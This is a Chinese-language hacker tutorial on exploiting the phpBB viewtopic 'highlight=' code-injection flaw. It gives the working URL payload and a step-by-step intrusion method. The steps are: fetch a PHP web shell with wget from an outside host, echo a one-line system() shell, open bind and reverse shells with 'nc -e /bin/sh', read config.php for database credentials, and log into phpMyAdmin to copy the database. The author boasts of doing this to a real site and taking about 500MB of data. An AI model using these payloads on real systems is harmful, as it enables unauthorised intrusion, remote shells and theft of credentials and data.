文章作者:作者:ik www.zuso.org 2. 漏洞名称:phpBB viewtopic highlight= 漏洞 3. 编写前言:虽然这个漏洞出了有一段时间, 但是到现在还是许多使用者没有更新.最近更是新出了phpBB2.x&PHP4.3.x unserialize函数内存泄露漏洞.但是很多朋友拿到了数据库密码和文件目录却不知道如何使用.颜颜也说没有看过针对phpbb run on unix like system 的应用文章, 我想刚好, 就把一些应用跟思路写了出来.两个漏洞不一样,但是思路我想还是可以借鉴的.呵, 废话不多说了, 漏洞是天天有新的,最主要的是你的思路. 4. 漏洞用法:http://www.xxxx.com/phpBB2/viewtopic.php?t=1&highlight=%2527%252esystem(CMD)%252e%2527CMD=指令 用 ascii code 编码, like chr(108)%252echr(115) 即为 ls 的意思!更多 ascii code 请参考 http://www.asciitable.com/ , 这边不多介绍啰 :p 5. 我的思路:一般发现论坛有问题之后, 我的第一步会是先检查他的权限, 以及我是否有足够权限写入! 用 'id' 会看到你现在的身分! 一般 apache 预设都是 nobody 或者 www !来寻找可以写入的地方吧 'ls -laR' 一般在 ~path/files/ 下面可以写入...试试看!嗯, 再来检查 wget 是否存在, 'ls -la /usr/local/bin' 看看有没有 wget...如果有, 我的下一步就是 'wget -O ~path/files/ik.php http://www.xfocus.net/tools/200405/PhpShell.php'(希望可以写入呀, X客中国那次就是这样玩的!) 成功的话直接在 ~path/files 目录下就可以执行 ik.php 了!但, 又有问题了, 如果在 bin 下面找不到 wget 怎办? 那就用 echo 吧! (总不会连 echo 最基本的都没吧=_+)丢一个最小的 php shell 吧! 'echo "<? system(\$_REQUEST['cmd']); ?>" > ~path/files/ik.php' ! 若能写入就成功了!用法就是 'http://www.xxx.com/phpBB2/ik.php?cmd=指令' ! 那... 如果都不能写入怎办!? 就此放弃吗? 想太多!试试看 nc 吧! 把他 bind 一个 port 出来 'nc -l -p 5555 -e /bin/sh' 然后我在 'telnet targetIP 5555' ! 成功的话就进去了!什么!? 他在 router (IP Share 后面怎办!?) 那就让他自己连回来吧, 先在我的 linux box 上面 'nc -l 6666' 开始监听!在目标上面再执行 'nc myIP 6666 -e /bin/sh', 如果成功的话, 我的这边就成功取得 shell 了!那... 如果以上方法都不行怎办!? 总不能就此放弃吧!? 因为是 php 使我不得不想到 phpmyAdmin 呀!来看看他的 config.php 档吧, 黑不掉首页 拿不到权限, 资料库总该借瞄一下吧!? 瞄不到, 密码也该借一下吧!?这个写着 MySQL 连线资讯的档案, 大家应该都会用猫 (cat) 去看! 但有的时候, cat 并不能使用, 该怎办呢? 找找其他指令吧, 我会用 more config.php 试试, 接着 tail -f config.php 等等! 基本上都可以用的! 若没有该指令就换下一个!得到这份密码, 令我想到更多事情可以玩, 我会先 'locate phpmyadmin' 'locate phpadmin' 找出有没有 phpmyadmin!如果有, 就连到 ~path/phpmyadmin 然后用那组帐号密码进去帮他备分一下阿, 做人要厚道, 黑他之前也要备份一下哩 :p就像那次我黑 X客中国 就是如此, 将近 500mb 的资料库从中国抓到美国= =